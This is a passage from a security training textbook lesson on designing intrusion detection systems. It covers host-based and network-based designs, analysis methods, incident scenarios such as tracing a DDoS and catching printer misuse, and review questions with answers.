over the line is when false signals might be sent, as shown in Figure 7-6. In other
words, if something that the policy has identied as acceptable has not been
entered into the IDS and therefore is not known as acceptable, the IDS might
send an alarm indicating an incident. This is known as a false-positive. False-
positives take time and energy, and as much as possible, they should be
minimized by proper policy making and data entry in the IDS.
A false-negative, on the other hand, is more than lost time and energy. In fact, a
false-negative does not equate lost time and energy, since no one is aware that the
condition happened. In other words, a false-negative is when an incident should
cause an alarm, but it does not. This is a serious issue, and those responsible for
the IDS of an organization need to be sure that the policies createdand the
rules implementedminimize the opportunities for false-negatives to occur.
Lesson 7: Designing an Intrusion Detection System 381
Figure 7-6: False situations, both positive and negative.
Since, in reality, the dividing line is not so clear, it becomes important for the
security professional to be aware of the applications running and the current secu-
rity policies of the organization. The same security professional needs to be made
aware of any unusual activity that might take place in the network.
For example, if the organization has recently hired 20 new Help Desk users, their
trainer might be showing them various options and situations in the network, such
as what it looks like to attempt access to unauthorized les, or to attempt to log
on as a different user. The security professionals in the network need to know this
is happening, so that their response is correct for the situation.
Information Collection and Analysis
As you begin to work with the tools available to you, you will need to become
comfortable with data collection and analysis. In this section, you will not go into
signicant detail on the headers and data contentthat will be addressed
elsewhere. Instead, you will discuss the concepts of data collection and the con-
cepts of data analysis.
With all the sources available to work with, an intimidating problem can arise
quickly to the security professional working on the IDS of an organization. Some
of the many questions that will arise are:
What is to be collected?
What data is to be discarded?
What is to be identied in the data that is collected?
Once I do identify certain things in the data, are they good, bad, or neutral?
382 Tactical Perimeter Defense
We previously dened an intrusion as anything from threats, to theft, to misuse
but now you must dene analysis. What actually is analysis? Although there
might be many different meanings, in this discussion, you will identify analysis as
the concept of organizing and categorizing data according to the security policies
present for the network.
The analysis must identify the intrusions as previously dened. These intrusions,
then, are the actual data collected. They can either be about a user, a node, an IP
address, or any other given variable, again meeting the requirements of the
policy.
In order to begin the analysis process, there must rst be an analysis system in
place. The analysis system can be as simple as reading a single log le at night,
or as complex as multiple IDSs submitting data to an external database for future
data mining.
Regardless of the scale of the system, there are certain variables that must be
met, and all systems have these in common. These are the ability to generate the
initial data, categorize the data based on given rules, and process the data once
organized.
The collection of the data will be identied by the IDS, based on the rule set in
place for the policy. This data collection can be either user misuse of resources,
actual data theft, denial of service, or any of the types of data you have discussed
that might be part of the IDS.
Once the data has been collected, it must be organized in a usable format. This
categorization can generally be dened by the cause of alarm and led
accordingly. Two general categories that are commonly used are Misuse Of
Resources and Threats.
It is also common to organize the data by the type of signature present. If the
attack was of a known signature, such as a Ping of Death DoS attack, it can be
classied as such. By organizing the data using these known signatures, the
analysis phase can be a more efficient process, as the data is in the order of
attack.
TASK 7B-1
Discussing IDS Concepts
1. What are the differences between misuse and intrusion?
Misuse can occur if a user has access to a resource but uses that resource
for a purpose not intended by the owner of that resource. However, if a user
does not have access to a resource but gains access by subverting the net-
works or resources security, or by any other devious means, this is
considered intrusion.
2. Describe behavioral use in terms of an IDS.
First, categorize all network and resource usage into a set. Then, divide net-
work and resource access into two categoriesacceptable and unacceptable
usebased on policies that have been agreed to. This is a generalization for
the entire network, with the given that there will be exceptions made for spe-
cic users. Over a period of time, look for patterns of usage of these
resources to build a database of behavioral use.
Remember, not all misuse
detection is a threat.
Lesson 7: Designing an Intrusion Detection System 383
Topic 7C
Host-based Intrusion Detection
Now that the fundamental issues of intrusion detection have been covered, you
will examine the actual options for implementation. In this topic, you will detail
the host-based IDS.
Host-based IDS is where the data that will be analyzed is generated by hosts
(computers) in the network. This system has many variables in data collection,
since the source is so varied. A host-based system can be collecting data from
application logs, such as Web servers. At the same time, it is collecting data from
operating system logs.
Because the system is host based, it is generally quite good at detecting internal
misuse of resources. The event logs of each host can generate data on les
accessed, by whom, on what date, and at what time. This provides excellent
tracking data of misuse, and in the event of compromise, evidence of the attack.
Host-based IDS Design
Host-based IDS uses what are known as agents (also called sensors). These
agents are small programs running on the hosts, and they communicate with the
command console (remember, this is the central computer controlling the IDS).
There are two basic forms of design of the host-based IDScentralized and
distributed. One difference to keep in mind as you go through the steps of each is
that centralized design requires the data from the host to be sent to the command
console for analysis, and distributed design states that the host will analyze the
data in real time and send only alert notications to the command console.
Centralized Host-based IDS Design
As mentioned, a centralized design dictates that the data will be collected by the
host and sent over the network to the command console for analysis. Because the
data is gathered and sent from the host, there is no signicant performance drop
on the hosts, or agents. However, there also is no possibility of real-time detec-
tion and response.
384 Tactical Perimeter Defense
The following steps highlight the process of centralized design, and are shown in
Figure 7-7.
1. The host detects that an event has happened (such as opening a le, or log-
ging on to a user account). The event is written as an event record. The
record is written to a secured le on the host.
2. At a predened time, the host sends its records to the command console over
the network, using a secured (encrypted) link.
3. The command console receives the records and submits the data to the
detection engine.
4. The detection engine analyzes the data for known signatures.
5. The command console generates a log of its work as a data archive.
6. If an intrusion is detected, the command console generates an alert, and the
programmed notication is used.
7. The security professional receives the notication.
8. A response to the alert is created. The response used by the console has been
previously programmed by the security team for this type of intrusion event.
9. The alert is stored in a secured database.
10. The data used for generating the alert is archived.
11. The console generates a report of the alert activities.
12. Long-term analysis is used to determine if this alert is part of a bigger
intrusion.
Figure 7-7: Centralized host-based IDS example.
Lesson 7: Designing an Intrusion Detection System 385
Distributed Host-based IDS Design
The primary difference between centralized and distributed host-based IDS is
where the detection engine and analysis take place. In the distributed design, the
agents of hosts are the ones that perform the analysis.
There is a signicant advantage to this method. The intrusion data can be moni-
tored in real time. The ip side to this is that the hosts themselves can experience
a performance drop, as their computer is engaged in this work constantly.
The following steps highlight the process of distributed design, and are shown in
Figure 7-8.
1. The host detects that an event has happened.
2. The event is processed in real time in the detection engine, and is analyzed
for known signatures.
3. If an intrusion is detected, a notication is sent. (Some vendors have the
host generate the notication; others have the command console generate the
notication.)
4. A response to the intrusion is created. This can be from the host or console.
5. The alert of the intrusion is created and sent to the console, where it is
archived.
6. Long-term analysis is used to determine if this is part of a bigger intrusion.
(The analysis can consist only of alert data, so it might be limited.)
Figure 7-8: Distributed host-based IDS example.
386 Tactical Perimeter Defense
TASK 7C-1
Describing Centralized Host-based Intrusion Detection
1. Describe where and how data is collected in a centralized host-based
IDS.
1. The host detects that an event has happened. The event is written as an
event record. The record is written to a secured le on the host.
2. At a predened time, the host sends its records to the command console
over the network, using a secured (encrypted) link.
3. The command console receives the records and submits the data to the
detection engine.
4. The detection engine analyzes the data for known signatures.
5. The command console generates a log of its work as a data archive.
6. If an intrusion is detected, the command console generates an alert,
and the programmed notication is used.
7. The security professional receives the notication.
8. A response to the alert is created. The response used by the console has
been programmed by the security team for this type of intrusion event.
9. The alert is stored in a secured database.
10. The data used for generating the alert is archived.
11. The console generates a report of the alert activities.
12. Long-term analysis is used to determine if this alert is part of a bigger
intrusion.
Topic 7D
Network-based Intrusion Detection
The concepts and implementation of the host-based IDS might lead you to
believe that it is the best way to run your IDS. This might not be the case.
Although there are advantages to running a host-based system, it does not suit
every situation or meet every need.
If you require the IDS in your organization to analyze the actual TCP/IP traffic,
then network-based IDS is your choice. The IDS in a network-based design is
such that it will sniff the packets off the wire. Hardware devices, such as switches
and routers, can also be programmed to send this data directly to the IDS.
A signicant difference between host- and network-based IDS is the actual loca-
tion of the agents. In host-based IDS, the agents, or sensors, are placed directly
on the hosts. In network-based IDS, the source of the detection is often placed so
that it can sense the external traffic, or the intrusion attempts from the outside.
This allows the network-based system to detect what the host-based normally
cannot, such as a DoS.
Lesson 7: Designing an Intrusion Detection System 387
Another example of a difference between these two implementations would be the
detection of attempted access to a system by an attacker. Suppose, for a moment,
that an attacker breaks into the network and attempts to log in to a host. The
host-based system will not report, or have the ability to identify, anything until
the actual login request happens. The network-based system will identify the pat-
tern of the request itself, before (ideally) the attacker has successfully logged in.
Network-based IDS Design
The physical layout of the network-based IDS is such that sensors are installed in
key positions throughout the network, and they all report to the command
console. In this case, the sensors are full detection engines that have the ability to
sniff the packets, analyze for known signatures, and notify the console with an
alert if an intrusion is detected.
There are two basic forms of design of network-based IDS: traditional and
distributed. The traditional design uses sensors in promiscuous mode, sometimes
called network taps. The distributed design employs agents throughout the net-
work to sense network traffic that is destined for the host itself.
Traditional Network-based IDS Design
Traditional design of network-based IDS uses sensors in the network. A sensor is
a host that is congured to run the IDS software and is usually a stand-alone
computer. Further, each specic host (sensor) has a network card (and software)
installed that can run in promiscuous mode, to sniff the network traffic. The pack-
ets are then fed directly into the detection engine, where analysis can happen. The
general theory on sensor placement is that there should be one on each critical
segment of the network. The alarms generated are then sent to the command
console. This design is depicted in Figure 7-9.
The following steps highlight the process of the traditional design:
1. A network packet is sent from one host to another in the network (this can
include a packet from the Internet to a rewall).
2. The packet is pulled off the network in real time by the network sensor,
which is generally positioned between the two communicating hosts.
3. The packet is processed in real time in the detection engine, and is analyzed
for known signatures.
4. If a signature match is detected, an alert is created and forwarded to the
command console.
5. The security professional is notied of the alert.
6. A response to the alert is created. The response used by the console has been
programmed by the security team for this type of intrusion event.
7. The alert is archived for later analysis, and a report of the incident is
created.
8. Long-term analysis is used to determine if this is part of a bigger intrusion.
388 Tactical Perimeter Defense
Figure 7-9: Traditional network-based IDS example.
Distributed Network-based IDS Design
Despite the effectiveness of the traditional design in collecting network packets, it
is susceptible to packet loss on network segments. A variation of the traditional
design was introduced to address this situationdistributed design. In the distrib-
uted design, a sensor is installed on each host in the network, instead of on each
segment of the network. The sensors then communicate with each other in the
event of an intrusion, and uses the command console as a center of operations,
and for alarms.
As you might imagine, this type of design has led to much confusion on the dis-
tinction between network- and host-based IDS. What you must realize is that the
location of the sensor, or agent, is not the determining factor in what type of
design is implemented.
If the IDS is running on each computer and those computers are analyzing tasks
of the operating system, then it is host-based. If the IDS is running on each com-
puter and those computers are analyzing the packets with the Ethernet device,
then it is network-based. This is important to remember, specically when dealing
with IDS vendors. Be sure that if you buy a commercial product, you get exactly
what you want. The process is depicted in Figure 7-10.
The following steps highlight the process of the distributed design:
1. A network packet is sent from one host to another in the network (this can
include a packet from the Internet to a rewall).
2. The packet is pulled off the network in real time by the network sensor, on
the individual host.
3. The packet is processed in real time in the detection engine, and is analyzed
for known signatures.
4. If a signature match is detected, an alert is created and forwarded to the
command console.
5. The security professional is notied of the alert.
6. A response to the alert is created. The response used by the console has been
programmed by the security team for this type of intrusion event.
7. The alert is archived for later analysis, and a report of the incident is
created.
8. Long-term analysis is used to determine if this is part of a bigger intrusion.
Lesson 7: Designing an Intrusion Detection System 389
Figure 7-10: Distributed network-based IDS example.
TASK 7D-1
Discussing Sensor Placement
1. Is the location of the sensor the determining factor in deciding if the
IDS is host-based or network-based? Explain your response.
No. If the IDS is running on each computer and those computers are analyz-
ing intrusion attempts on the operating system, then it is host-based. If the
IDS is running on each computer and those computers are analyzing the
packets with the Ethernet device, then it is network-based.
2. Describe the process of a traditional network-based IDS.
1. A network packet is sent from one host to another in the network (this
can include a packet from the Internet to a rewall).
2. The packet is pulled off the network in real time by the network sensor,
generally positioned between the two communicating hosts.
3. The packet is processed in real time in the detection engine, and is ana-
lyzed for known signatures.
4. If a signature match is detected, an alert is created and forwarded to
the command console.
5. The security professional is notied of the alert.
6. A response to the alert is created. The response used by the console has
been programmed by the security team for this type of intrusion event.
7. The alert is archived for later analysis, and a report of the incident is
created.
8. Long-term analysis is used to determine if this is part of a bigger
intrusion.
390 Tactical Perimeter Defense
Topic 7E
The Analysis
In the previous topic, you examined the processes of the different types of IDS
implementation. One common point in all of them was the analysis of data once
it has been collected. In this topic, you will look into the analysis process itself.
When to Analyze
After the agents, or sensors, have been set in place, the timing of analysis must
be dened. While this might be part of the architecture chosen, it is worth noting
the options and their strong and weak points.
Interval Analysis
This method of analysis uses the internal operating system (or other host-based)
audit logs to capture the events, and the IDS, at given intervals, analyzes the data
in the logs for signatures of intrusion.
Using this method of analysis is effective in organizations where the perceived
threat is low and the potential loss from a single attack is high, such as a very-
well-guarded server that holds the organizations most secret data. Those running
this type of analysis are more concerned with the data collected and accuracy
than speed. The data collected in this case is often, if secured properly, used in
legal proceedings during criminal prosecution.
Another strong point of interval analysis is that there is less of a burden placed
on the individual hosts to perform the analysis, since it is not in real time. And,
this type of analysis is a benet to organizations that are not large enough to have
a full-time employee or consultant watching for intrusion signatures.
On the other hand, there are weaknesses to this type of analysis. An incident is
usually not identied until after it has occurred, which presents obvious problems.
Because the analysis is in intervals, the ability to notice and respond to an inci-
dent quicklyor as it is happeningis close to nonexistent. Additionally, if the
hosts that are running the analysis do not have sufficient disk space to hold the
events, problems can occur.
Real-time Analysis
As an alternative to interval analysis, there is real-time analysis. This involves, as
the name implies, data being analyzed for signatures as it is collected.
Real-time analysis runs continuouslycollecting, analyzing, reporting, and
responding (if programmed to do so). Do not misunderstand the term real-time to
mean same-time. An event cannot be countered the exact moment it happens.
However, the concept behind real time is such that an attack should be dealt with
as it is happening, and if the system knows the signature, stop the attack before it
can complete and compromise a host.
Lesson 7: Designing an Intrusion Detection System 391
This type of analysis has the ability to respond in real time, via the methods pre-
viously discussed (email, pages, and even telephone calls). The real-time nature
of this analysis means that security professionals can respond while an attack is
underway, and stop it. An additional benet to real-time analysis is that hosts can
be recovered quickly in the event of a compromise, because there is no need to
wait for the analysis to nd out what has been compromised.
However, just as there are benets, there are weaknesses to this type of analysis.
One of the more critical weaknesses might be the extra resources used by the
hosts. More memory and processing will be required.
Because the systems can be programmed to provide an automated response, this
must be planned carefully. Unless you can guarantee the system will analyze the
data correctly, and respond as expected, the automatic response needs to be con-
sidered cautiously. A response of disconnecting a distribution partner over the
Internet due to an error in analysis could be very costly.
How to Analyze
You have discussed the methods of when to have the IDS analyze data, but it is
just as critical to determine how the analysis is going to happen. Again, this
might be part of the architecture of the design, but the individual points must be
described.
Signature Analysis
The common element that most IDS products have in common is signature
analysis. The signature is a known event or pattern of events that correspond to
acknowledged or known attacks. These signatures can be very simple to detect,
like a ood of ICMP requests to a given server, or much more subtle, like a
failed login request on a server three times in a week from an external source.
Signature analysis is the process of matching the known attacks against the data
collected in the network. If there is a match, then that is a trigger for an intru-
sion, and an alarm might be the result.
Most commercial IDS vendors have a list of known signatures, much like the
antivirus industry. The big difference is that the majority of the antivirus compa-
nies have lists of over 20,000 known signatures for viruses and Trojan horses,
and, these companies can react very quickly, and have the signatures uploaded to
webites for users to download.
By way of comparison, an IDS might have only a few hundred signatures to use.
The users of the IDS are then left to download further signatures when they are
available, or analyze the data and create their own signatures.
An Example Signature
Although the signatures that an IDS uses can be complex, you can use parts of a
signature to illustrate how the analysis works. Suppose that the data displayed in
Figure 7-11 is collected by the IDS.
392 Tactical Perimeter Defense
Figure 7-11: An example of data collected by an IDS.
If this signature was not in the database of known signatures to the IDS, the
security professional running the IDS should still be able to identify the attack.
Lets perform a brief analysis of this data. You can identify that the source
address is 172.168.30.23. You would check the IP address to see if there is any
historical data regarding this IP address. The IDs are sequential, corresponding to
the time of the event. This indicates a very fast event, as all IDs are less than one
second apart (event starting at 8:52:52 and ending at 8:52:53). The destination
port tells us the source is running a scan to see what hosts have a telnet server
running. The scan is a scan of the entire network of IP addresses, 1 through 254.
Our brief analysis of this event, then, is: At 8:52:52, the network 192.168.10.0/24
was scanned to see which computers were running telnet servers. The scan con-
cluded at 8:52:53. The likelihood that the source IP address was spoofed is low,
because the attacker would need the scan to return data on hosts running telnet.
Because none of the computers scanned run telnet, the risk from this event indi-
vidually, is low. There is no historical data to indicate previous activity from this
source IP address. However, it is now recorded that there is intrusion activity
from 172.168.30.23, and future attempts will correlate with this data.
The previous example illustrates the process of analyzing signatures. The IDS can
only detect the signatures it is aware of; other activity will need to be identied
by the professionals using the system.
Statistical Analysis
A common scientic method, not often implemented in commercial IDS products,
but worth discussing, is statistical analysis. The basic concept of statistical analy-
sis is to nd a deviation from a known pattern of behavior. Using this method, an
IDS would create proles of user behavior. Examples of the types of behavior
might include login times, amount of time on the network, and the amount of
bandwidth used.
Lesson 7: Designing an Intrusion Detection System 393
This data is then described as the normal usage of this prole. When an event
happens that is not in the normal usage pattern, a possible intrusion is the result.
The normal example of this would be login times. If a user has consistently
logged in only between 8:30 A.M. and 6:30 P.M. for the last year, if that account
tries to login at 2:00 A.M., a possible intrusion is happening, and an alert would
be issued.
TASK 7E-1
Discussing Data Analysis
1. Which type of data analysis is often used as the method of analysis for
legal proceedings involving IDSs?
Interval analysis.
Topic 7F
How to Use an IDS
In this topic, you will be introduced to the different methodologies of intrusion
detection. While there are no methods set in stone, this topic attempts to outline
several examples for you to use in the future. These detailed intrusion examples
include DoS, network sweeps, and internal misuse of resources.
Detection of Outside Threats
One of the issues of ever-increasing trouble for networks is Denial of Service
attacks. When attackers choose to block service without attempting network pen-
etration, it can be a difficult problem to solve.
Imagine the following scenario:
It is 4:40 P.M. on Friday. You are about to go home and enjoy the weekend. You
hear your incoming mail sound, and look at the new message. Incoming ICMP
packets, lots of them. You are not going home after all.
You begin your investigation. It seems the ICMP packets have been detected as a
Denial of Service attack. You have seen this before, and are familiar with the
signs.
As you investigate further, you realize it is more than a simple ping attack. It
seems to be a Distributed Denial of Service. The IDS is alarming with signs of
attack from 101 distinct IP addresses.
You continue to dig, as you read the log les, and it turns out although there are
101 addresses listed, they all register to the same local ISP. By now, youre think-
ing, I hope Saturday afternoon will be nice.
The pings pause for a minute. Unusual, you think. It is almost like the attacker
did not enter enough packets to maintain the high DDoS attack. About 10 min-
utes later, it starts again. You have been on the phone this entire time with your
ISP trying to get them to block ICMP requests.
prole:
Patterns of a users activity
which can detect changes in
normal routines.
penetration:
The successful unauthorized
access to an automated
system.
394 Tactical Perimeter Defense
Back to the log les, where you see the attacks coming from the same group of
nodes. The attacker must have re-entered the script, perhaps this time with a
higher count. Now, your ISP is noticing, and they indicate they will open a ticket
to investigate.
Back to the log les, where further investigation conrms the IP addresses used
are all in the same block from the same local ISP. You get on the phone to the
local ISP. They are helpful and willing to work with you to locate the offending
IP addresses. They conrm that those addresses are all in their range.
Since the local ISP is only a few miles away, and the IP addresses in question are
all local, you are thinking the attacker must have targeted your network on pur-
pose, and you are not the victim of a random DDoS. On the other hand, your
organization has not lost a veriable amount of money over the attack so far, so
FBI involvement will probably not be needed.
The local ISP administrator is helpful and works with you on helping to locate a
source. The pings stop again. Even though they went longer this time, they still
stopped. Again, there is a pause in the action for a while, and it picks up again.
Back to the log les. Again, you nd 101 addresses in the attack. The local ISP
administrator calls to tell you there is no new news yet. Into the night, you
decide to leave and come back in the morning.
Returning in the morning, you turn to the log les. The log les indicate that the
attacks continued throughout the night, 101 addresses every time, yet each attack
running only for 10 minutes.
You dump the logs into a database for analysis, and you decide to see which
addresses were involved in each attack. This turns out to be the break you were
looking for.
In the data logs, it turned out that only three IP addresses were involved in every
attack. Working with the local ISP, you identify that two of the addresses are
dial-up accounts and rarely on. The third is a DSL user who is always connected.
You suspect this user is the culprit. Although the local ISP will not reveal the
identity of the user to you, they had helped you as much as you could hope for.
Now, you are onto internal research.
You begin by combing through the current employee list and checking for home
email addresses. The company is not all that large, so it is an easy task. You view
the list from top to bottom and nd nothing.
Next, you decide to go through the list of past employees, starting with people
who were let go or who resigned in the last six months. This is a much smaller
list, only 17 names.
There it isin black and white. There is one ex-employee who was red only a
month ago. The home email address does indeed come from the same local ISP.
You pull out a saved email from the archive and check the headers. Sure enough,
the IP address matches. You are hot on the trail of the attacker and have enough
evidence to go to the next level.
Now, imagine this scenario without the IDS running. What would the situation be
in this case? The network would seem slower, but it would take time to isolate
where it is slowing down. Without IDS, you would not have the head start, you
would not have logging of the IP addresses, and you might have a hard time
tracking down not only the cause, but you would have a hard time deciding on a
response and solution.
Lesson 7: Designing an Intrusion Detection System 395
Detection of Inside Threats
Lets now look at an example of how IDS can work to detect inside threats. This
is one of the difficult areas of security. Because these users already have some
level of access to the network, dealing with inside threats can be more complex
than outside.
A reason that this is a difficult area of security is the term threat. In this case, a
threat is not always someone stealing data, more the inappropriate use of com-
pany resources. So, for this example, you will look at a user who is misusing
resources, not attempting data thievery.
At 11:30 A.M. on a Tuesday, you are notied that two of the color laser printers
are running out of toner every Monday. Because the company has laser printers
all over the office and only a few people are granted permission to each printer,
this is unusual. It should be several months before the printers need relling.
However, every Monday two of them are nearly out and end up getting relled.
You are investigating to nd out the culprit, but cannot nd anything right away.
You add the IP address of the laser printers to the IDS to track who is sending
what to the printers, and when.
Every night, you check the logs and nd nothing out of the ordinary. By Friday
night, you are wondering if perhaps the printer is malfunctioning. You remotely
connect into the network over the weekend and check the logs on Saturday night.
Still, you nd nothing.
Sunday night, around 11:30 P.M., you remotely connect into the network again to
check the logs. Again, there is nothing to report as unusual. You go to bed, won-
dering what the situation will be like in the morning.
When you get to work on Monday, you are pulled into a meeting that lasts until
1:00 P.M. When you nally get out of the meeting, you see a note on your moni-
tor that states, Yes, we just had to replace the toner again. What did you nd?
You get on the network and head right to the log les. Finally, there it is. There
is an enormous print job sent at 7:00 A.M. It took over two hours to nish
printing. You quickly identify the IP address and host name of the computer that
sent the data.
You inform the network administrators of what you found, and the two of you
take a walk. When you get to the cube of the worker who used that computer,
you can see the evidence quite clearly.
All over the walls are glossy printed photographs; they are 11x17 full color
photographs. Stacks of 11x17 photos are on the desk.
After a conversation, you nd out that this employee has taken up digital photog-
raphy as a new hobby. And, every weekend this employee shoots hundreds of
pictures, only to come in to work rst thing in the morning, and print out as
many as possible. (Until the colors are not as crisp and bright on the printout,
and then I stop, you are told.)
This is a classic example of resource misuse, which can be identied with the
IDS in place. Without the IDS, this task is much more complex, and perhaps
someone would be asked to physically watch the printer for use in this fashion.
396 Tactical Perimeter Defense
Anticipation of Attack Monitoring
One of the standard attack sequences for hackers just starting out is the ping
sweep for live hosts. Not complex, or difficult, but worth noting in any event.
The ping sweep simply pings a given range of IP addresses. The nodes that
respond are active, and might be potential targets.
Virtually all IDS systems will pick up and notify on ping sweeps. This type of
traffic can lead to nothing, or it could be the early attempt to map the network for
further attacks. The IDS will recognize the signature of sequential ping packets in
rapid succession, and an alarm will sound.
By recognizing a ping sweep, the organization can decide their proper response.
Perhaps they respond with a message to the ISP that holds the IP address, or per-
haps they simply monitor for further traffic from that IP address. In any case, the
ability to choose a course of action exists due to the presence and function of the
IDS.
Surveillance Monitoring
When there has been some indication of either a threat of a break-in, resource
misuse, or some other unauthorized activity, the IDS can be used in a mode of
surveillance. At rst glance, this might seem to be the entire function of the IDS
in the rst place. However, in this particular area, the reference is to more of an
increased level of awareness. Beyond the normal day-to-day monitoring that hap-
pens, this is when a threat has been identied.
Take the following situation as an example: A company has had the same senior-
level network administrator for ve years. Recently, this administrator was found
to be working part-time for another company. Because this person was at a senior
level and had an exclusive contract, he had to be let go.
The release was not a pleasant one, but no threats or poor language was used
towards either party. This situation would, however, be cause to put the IDS into
a surveillance mode, with the specic goals being to monitor traffic that could be
coming from the released employee.
The task of detecting an ex-employee can be difficult (even more so if it is a
technical person) because this person is aware of the internals of the network.
Nonetheless, this situation would require an IDS on a higher alert.
TASK 7F-1
Discussing Intrusion Detection Uses
1. Describe how an IDS can be used to detect an outside threat.
Answers will vary, but may include: To identify attack signatures that are
originating from IP addresses other than your internal private range.
Lesson 7: Designing an Intrusion Detection System 397
Topic 7G
What an IDS Cannot Do
Throughout this lesson, you have identied and discussed the abilities of IDSs.
As good as they are, and as helpful to the security of the network as they are,
they do have limitations. An IDS can only do what it is designed to dodo not
expect more from it. In this topic, you will examine some of the things an IDS
cannot do.
Provide the Magic Solution
Although some IDS vendors might try to convince you of this, an IDS is not a
magic solution. It does not have the ability to bring the security of your network
to perfection. An IDS cannot, and should not, be expected to suddenly notice
every single event that you might consider to be an intrusion or misuse. It can
perform only as it is programmed. If a new type of intrusion is created today, the
IDS cannot magically be congured to know this signature by this afternoon.
Relying on the IDS to an extreme can create security professionals that get com-
placent and miss new or unusual intrusions when they occur. Your skill and
knowledge as a security professional must remain at the highest level, regardless
of the equipment in the organization.
Manage Hardware Failures
This might seem like an obvious point, but lets dene it a bit further. If a new
attack comes into your network, suddenly hits your 1,000 Linux Workstations (all
nodes), and they all crash, there are no nodes available to inform the IDS of an
intrusion.
Yes, the IDS (if on a different platform) might still be on, and you might get a
page that states, All of your Linux computers are gone, but you cannot expect
the IDS to manage any of those failures. The IDS might inform you that the
event happened, but dont expect more.
Investigate an Attack
There are options for what an IDS can do to respond to an attack. But responding
is not the same as investigating. An IDS cannot notice a SYN ood coming from
the same IP address, and follow up on it. The IDS will inform you of the SYN
ood, and it will be up to you to follow up.
The IDS will provide the data for the investigation, but do not expect the IDS to
perform any of the investigation itself. Although, if that day ever comes, there
will be some interesting ramications of it. Imagine your IDS paging you to
state, You had a SYN ood at 2 A.M. I traced the IP address, sent a message to
their ISP, and had the attacker arrested. Have a nice day!
crash:
A sudden, usually drastic
failure of a computer system.
SYN ood:
When the SYN queue is
ooded, no new connection
can be opened.
398 Tactical Perimeter Defense
100 Percent Analysis
Once the data has been collected by the IDS, then some serious investigation
must happen. There must be a way of analyzing all the collected data. Because
most organizations do not have a full-time (24 hours a day, 7 days a week)
human monitoring the IDS statistics, analysis of the data is required.
To expect the IDS to perform a perfect 100 percent analysis on the data is unreal-
istic, as the amount of data would be too high. The computers running the
analysis would not be able to keep up with that high volume of traffic. To say to
the IDS, Here is all the data collected in the last week, tell me everything that
happened, and think you can then sit back and watch for the results of the
analysis is also unrealistic.
TASK 7G-1
Discussing Incident Investigation
1. Describe why an IDS cannot investigate an intrusion attempt.
The IDS is able to identify an attack, even in real time; however, it cannot
investigate the attack. It might be able to respond, by closing ports, or pag-
ing the security professional. There is no mechanism in modern IDS systems
for tracking down IP addresses, contacting the correct ISP, or explaining an
intrusion attempt to the FBI.
Summary
In this lesson, you were introduced to the concepts and technologies of
IDSs. You examined the differences between using host-based and network-
based IDSs, and how each of them can be implemented. You examined the
types of data analysis. You identied multiple scenarios of an IDS in use,
and how each one presents a different situation to the IDS. Finally, you
examined the situations an IDS cannot help with, and the tasks an IDS can-
not perform.
Lesson Review
7A What are the major components of an IDS?
Prevention, detection, and response.
What is one reason you need to be careful with the response of the IDS?
You have to exercise caution in determining the level of response to inci-
dents, since aggressive or offensive responses may open up the organization
to serious legal issues.
Lesson 7: Designing an Intrusion Detection System 399
Whats worse: a false-negative or a true-positive?
A false-negative, as it signies that an alarm was not generated when a con-
dition should have been alerted.
7B Describe how an Ethernet host, running in promiscuous mode as an
IDS, sniffs packets off the local segment.
1. A host creates a network packet. So far, nothing is known other than a
packet exists that was sent from a host in the network.
2. The IDS host reads the packet in real time off the network segment.
3. The detection program in the sensor matches the packet with known
signatures of misuse. When a signature is detected, an alert is gener-
ated and sent to the command console.
4. The command console receives the alert and noties the designated per-
son or group of the detection.
5. The response is created in accordance with the programmed response
for this matching signature.
6. The alert is logged for future reference.
7. A summary report is created.
8. The alert is viewed with other historical data to determine if there is a
pattern of misuse or to indicate a slow attack.
7C Describe the general process of host-based IDS.
Host-based IDS uses what are known as agents (also called sensors), which
are small programs running on the hosts that are programmed to detect
intrusions upon the host. They communicate with the command console.
What are the different designs of host-based IDS?
Centralized and distributed.
Describe the advantages and disadvantages of each design of host-based
IDS.
In centralized design, the data is gathered and sent from the host to a cen-
tralized location. There is no signicant performance drop on the hosts
because the agents simply gather information and send it elsewhere for
analysis. However, due to the nature of the design, there is no possibility of
real-time detection and response.
In distributed design, the agents of the hosts are the ones that perform the
analysis. There is a signicant advantage to this method. The intrusion data
can be monitored in real time. The ip side to this is that the hosts them-
selves can experience a bit of a performance drop as their computer is
engaged in this work constantly.
7D Describe the general process of network-based IDS.
In network-based IDS, sensors are installed in key positions throughout the
network, and they all report to the command console. The sensors are full
detection engines that have the ability to sniff network packets, analyze for
known signatures, and notify the console with an alert if an intrusion is
detected.
400 Tactical Perimeter Defense
What are the differences between host-based and network-based IDS?
Host-based IDS is designed to detect intrusions on a host, whether the
attempt to intrude comes through a network interface or the keyboard.
Network-based IDS is designed to detect intrusions in a network by analyz-
ing network traffc, regardless of any specic host.
What are the different designs of network-based IDS?
Traditional and distributed.
Describe the advantages of each design of network-based IDS.
In the traditional design of network-based IDS, sensors are used in the net-
work where a sensor is a host that is congured to run the IDS software.
This is usually a stand-alone computer. Each sensor runs in promiscuous
mode. Packets are then fed directly into the detection engine for analysis. In
general, there should be one sensor in each critical segment of the network.
Any alarms that are generated are sent to the command console. In the dis-
tributed design of network-based IDS, a sensor is installed on each host in
the network, instead of on each segment of the network. The sensors then
communicate with each other in the event of an intrusion, and use the com-
mand console as a center of operations, and for alarms. This provides the
opportunity to detect packets that might otherwise have been lost or missed
by the traditional design IDS.
7E What is the difference between interval and real-time analysis?
In interval analysis, the operating system (or other host-based) audit logs
are used to capture the events, and the IDS, at given intervals, analyzes the
data in the logs for signatures of intrusion. With real-time analysis, data is
analyzed for intrusion signatures as it is collected.
What is the difference between statistical and signature analysis?
In signature analysis, known attack signatures are compared against data
collected in the network. A match results in a trigger for an intrusion, and
an alarm might follow. Statistical analysis attempts to nd deviations from
known patterns of behavior. Using this method, an IDS would create proles
of user behavior. This data is then described as the normal usage for this
prole. When an event happens that deviates from the normal usage pattern,
it could mean a possible intrusion.
7F Describe the process of detecting internal misuse.
Most internal threats are network or resource misuse. This is one of the diff-
cult areas of security. Since the users already have some level of access to
the network, dealing with inside threats can be quite a bit more complex
than outside. A reason that this is a diffcult area of security is that the
threat does not always result in someone stealing data, more the inappropri-
ate use of company resources. Detecting internal misuse might require
auditing of network resources such as le and print servers, and so on.
Lesson 7: Designing an Intrusion Detection System 401
Describe the difference between surveillance and normal IDS operation.
When there has been some indication of either a threat of break-in, resource
misuse, or some other unauthorized activity, the IDS can be used in surveil-
lance mode. While this might seem to be the entire function of the IDS in the
rst place, the reference is to more of an increased level of awareness versus
normal mode of operation.
7G What is the reason an IDS cannot manage hardware failures?
The IDS might be able only to inform you that an event happened. If the
